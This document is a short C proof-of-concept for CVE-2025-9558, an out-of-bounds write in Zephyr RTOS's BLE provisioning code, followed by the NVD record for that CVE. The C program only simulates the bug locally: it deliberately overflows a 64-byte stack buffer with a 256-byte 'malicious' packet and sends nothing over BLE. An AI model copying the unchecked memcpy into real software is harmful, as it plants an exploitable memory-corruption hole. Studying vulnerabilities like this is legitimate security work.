CVE-2025-9558

// CVE-2025-9558 PoC - BLE Provisioning OOB Write // Target: Zephyr RTOS pb_adv.c gen_prov_start function // Attack vector: Send oversized provisioning packet #include <stdio.h> #include <string.h> #include <stdlib.h> // Simulated BLE provisioning packet structure struct prov_packet { uint8_t type; uint8_t length; uint8_t data[256]; // Malicious oversized data }; // Vulnerable function signature from Zephyr pb_adv.c // void gen_prov_start(struct prov_ctx *ctx, uint8_t *data, uint16_t len) void gen_prov_start_vulnerable(uint8_t *link_rx_buf, uint16_t buf_size, uint8_t *data, uint16_t data_len) { // VULNERABLE: No size validation before copy // memcpy(link_rx_buf, data, data_len); // OOB Write occurs here printf("[VULN] Copying %d bytes to buffer of size %d\n", data_len, buf_size); memcpy(link_rx_buf, data, data_len); // OOB Write } int main() { printf("=== CVE-2025-9558 PoC Demonstrator ===\n"); printf("Target: Zephyr RTOS BLE Provisioning OOB Write\n\n"); // Simulate the vulnerable scenario uint8_t link_rx_buf[64]; // Buffer smaller than attack data uint16_t buf_size = sizeof(link_rx_buf); // Craft malicious provisioning packet struct prov_packet malicious_pkt; malicious_pkt.type = 0x00; // Type: PROV_START malicious_pkt.length = 0xFF; // Intentional oversized length // Fill with pattern to detect overflow memset(malicious_pkt.data, 0x41, sizeof(malicious_pkt.data)); printf("[+] Buffer size: %d bytes\n", buf_size); printf("[+] Malicious data size: %d bytes\n", sizeof(malicious_pkt.data)); printf("[+] Overflow amount: %d bytes\n", (int)(sizeof(malicious_pkt.data) - buf_size)); // Trigger the vulnerable function printf("[+] Triggering gen_prov_start with oversized data...\n"); gen_prov_start_vulnerable(link_rx_buf, buf_size, malicious_pkt.data, sizeof(malicious_pkt.data)); printf("[!] OOB Write completed - memory corruption occurred\n"); printf("[!] Adjacent memory regions may be overwritten\n"); return 0; }

{"cve": {"id": "CVE-2025-9558", "sourceIdentifier": "[email protected]", "published": "2025-11-26T06:15:46.163", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is a potential OOB Write vulnerability in the gen_prov_start function in pb_adv.c. The full length of the received data is copied into the link.rx.buf receiver buffer without any validation on the data size."}, {"lang": "es", "value": "Existe una vulnerabilidad potencial de escritura fuera de banda (OOB) en la función gen_prov_start de pb_adv.c. La longitud completa de los datos recibidos se copia en el búfer receptor link.rx.buf sin ninguna validación del tamaño de los datos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-8wvr-688x-68vr", "source": "[email protected]"}]}}